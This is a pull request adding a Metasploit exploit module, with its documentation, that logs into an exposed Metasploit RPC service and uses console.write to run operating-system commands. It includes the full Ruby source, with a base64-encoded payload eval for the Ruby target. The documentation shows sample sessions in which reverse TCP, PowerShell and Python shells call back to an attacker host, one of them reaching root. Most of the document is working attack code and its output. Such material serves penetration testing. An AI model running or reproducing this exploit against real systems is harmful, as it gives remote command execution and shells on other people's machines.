### PR TITLE
Add Metasploit RPC Console Command Execution module

### DIFF
--- a/documentation/modules/exploit/multi/misc/msf_rpc_console.md
+++ b/documentation/modules/exploit/multi/misc/msf_rpc_console.md
@@ -1,0 +1,142 @@
+## Description
+
+  This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
+
+
+## Vulnerable Application
+
+  [Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
+
+  To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
+
+  This module has been tested successfully on:
+
+  * Metasploit 4.15 on Kali 1.0.6
+  * Metasploit 4.14 on Kali 2017.1
+  * Metasploit 4.14 on Windows 7 SP1
+
+  Source and Installers:
+
+  * [Source Code Repository](https://github.com/rapid7/metasploit-framework)
+  * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/multi/misc/msf_rpc_console`
+  3. Do: `set RHOST [IP]`
+  4. Do: `set RPORT [PORT]` (default: `55552`)
+  5. Do: `set USERNAME [USERNAME]` (default: `msf`)
+  6. Do: `set PASSWORD [PASSWORD]`
+  7. Do: `set LHOST [IP]`
+  8. Do: `run`
+  9. You should get a session
+
+
+## Options
+
+  **Username**
+
+  The username for Metasploit RPC (default: `msf`).
+
+  **Password**
+
+  The password for the RPC user.
+
+
+## Scenarios
+
+### Ruby Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 0
+  target => 0
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [+] 172.16.191.166:55552 - Authenticated successfully
+  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
+  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
+  [*] 172.16.191.166:55552 - API version 1.0
+  [+] 172.16.191.166:55552 - Created console #0
+  [*] 172.16.191.166:55552 - Sending payload...
+  [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
+
+  whoami
+  win-sgbsd5tqutq\user
+  ```
+
+### Windows CMD Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 0
+  target => 1
+  msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp 
+  payload => cmd/windows/powershell_reverse_tcp
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse SSL handler on 172.16.191.181:4444 
+  [+] 172.16.191.166:55552 - Authenticated successfully
+  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
+  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
+  [*] 172.16.191.166:55552 - API version 1.0
+  [+] 172.16.191.166:55552 - Created console #1
+  [*] 172.16.191.166:55552 - Sending payload...
+  [*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
+
+  Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
+  Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+  PS C:\metasploit>whoami
+  win-sgbsd5tqutq\user
+  ```
+
+### Unix CMD Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.215
+  rhost => 172.16.191.215
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 2
+  target => 2
+  msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
+  payload => cmd/unix/reverse_python
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [+] 172.16.191.215:55552 - Authenticated successfully
+  [*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
+  [*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
+  [*] 172.16.191.215:55552 - API version 1.0
+  [+] 172.16.191.215:55552 - Created console #0
+  [*] 172.16.191.215:55552 - Sending payload...
+  [*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
+
+  id
+  uid=0(root) gid=0(root) groups=0(root)
+  ```
+

--- a/modules/exploits/multi/misc/msf_rpc_console.rb
+++ b/modules/exploits/multi/misc/msf_rpc_console.rb
@@ -1,0 +1,152 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/rpc/v10/client'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Metasploit RPC Console Command Execution',
+      'Description'     => %q{
+        This module connects to a specified Metasploit RPC server and
+        uses the 'console.write' procedure to execute operating
+        system commands. Valid credentials are required to access the
+        RPC interface.
+
+        This module has been tested successfully on Metasploit 4.15
+        on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
+        4.14 on Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
+      'References'     =>
+        [
+          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
+          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
+        ],
+      'Platform'       => %w{ ruby unix win },
+      'Targets'        => [
+          [ 'Ruby',        { 'Arch'     => ARCH_RUBY,
+                             'Platform' => 'ruby',
+                             'Payload'  => { 'BadChars' => "\x00" } } ],
+          [ 'Windows CMD', { 'Arch'     => ARCH_CMD,
+                             'Platform' => 'win',
+                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ],
+          [ 'Unix CMD',    { 'Arch'     => ARCH_CMD,
+                             'Platform' => 'unix',
+                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ]
+        ],
+      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
+      'Privileged'     => false,
+      'DisclosureDate' => 'May 22 2011',
+      'DefaultTarget'  => 0))
+    register_options [ Opt::RPORT(55552),
+                       OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
+                       OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
+                       OptBool.new('SSL', [ true, 'Use SSL', true]) ]
+  end
+
+  def execute_command(cmd, opts = {})
+    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"
+
+    if res.nil?
+      fail_with Failure::Unknown, 'Connection failed'
+    end
+
+    unless res['wrote'].to_s =~ /\A\d+\z/
+      print_error "Could not write to console #{@console_id}:"
+      print_line res.to_s
+      return
+    end
+
+    vprint_good "Wrote #{res['wrote']} bytes to console"
+  end
+
+  def exploit
+    begin
+      @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
+    rescue Rex::ConnectionRefused => e
+      fail_with Failure::Unreachable, 'Connection refused'
+    rescue => e
+      fail_with Failure::Unknown, "Connection failed: #{e}"
+    end
+
+    res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']
+
+    if @rpc.token.nil?
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good 'Authenticated successfully'
+    vprint_status "Received temporary token: #{@rpc.token}"
+
+    version = @rpc.call 'core.version'
+
+    if res.nil?
+      fail_with Failure::Unknown, 'Connection failed'
+    end
+
+    print_status "Metasploit #{version['version']}"
+    print_status "Ruby #{version['ruby']}"
+    print_status "API version #{version['api']}"
+
+    vprint_status 'Creating new console...'
+    res = @rpc.call 'console.create'
+
+    if res.nil?
+      fail_with Failure::Unknown, 'Connection failed'
+    end
+
+    unless res['id'].to_s =~ /\A\d+\z/
+      print_error 'Could not create console:'
+      print_line res.to_s
+      return
+    end
+
+    @console_id = res['id']
+    print_good "Created console ##{@console_id}"
+
+    print_status 'Sending payload...'
+
+    case target['Platform']
+    when 'ruby'
+      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
+    when 'win'
+      cmd = payload.encoded
+    when 'unix'
+      cmd = payload.encoded
+    else
+      fail_with Failure::NoTarget, 'Invalid target'
+    end
+
+    execute_command cmd
+  end
+
+  def cleanup
+    return if @console_id.nil?
+
+    vprint_status 'Removing console...'
+    res = @rpc.call 'console.destroy', @console_id
+
+    if res.nil?
+      print_error 'Connection failed'
+      return
+    end
+
+    unless res['result'].eql? 'success'
+      print_warning "Could not destroy console ##{@console_id}:"
+      print_line res.to_s
+      return
+    end
+
+    vprint_good "Destroyed console ##{@console_id}"
+  ensure
+    @rpc.close
+  end
+end


### PR DESCRIPTION
This PR adds an exploit for Metasploit RPC.

        This module connects to a specified Metasploit RPC server and
        uses the 'console.write' procedure to execute operating
        system commands. Valid credentials are required to access the
        RPC interface.

        This module has been tested successfully on Metasploit 4.15
        on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
        4.14 on Windows 7 SP1.


## Verification

* [x] Start `msfconsole`
* [x] Do: `use exploit/multi/misc/msf_rpc_console`
* [x] Do: `set RHOST [IP]`
* [x] Do: `set RPORT [PORT]` (default: `55552`)
* [x] Do: `set USERNAME [USERNAME]` (default: `msf`)
* [x] Do: `set PASSWORD [PASSWORD]`
* [x] Do: `set LHOST [IP]`
* [x] Do: `run`
* [x] You should get a session
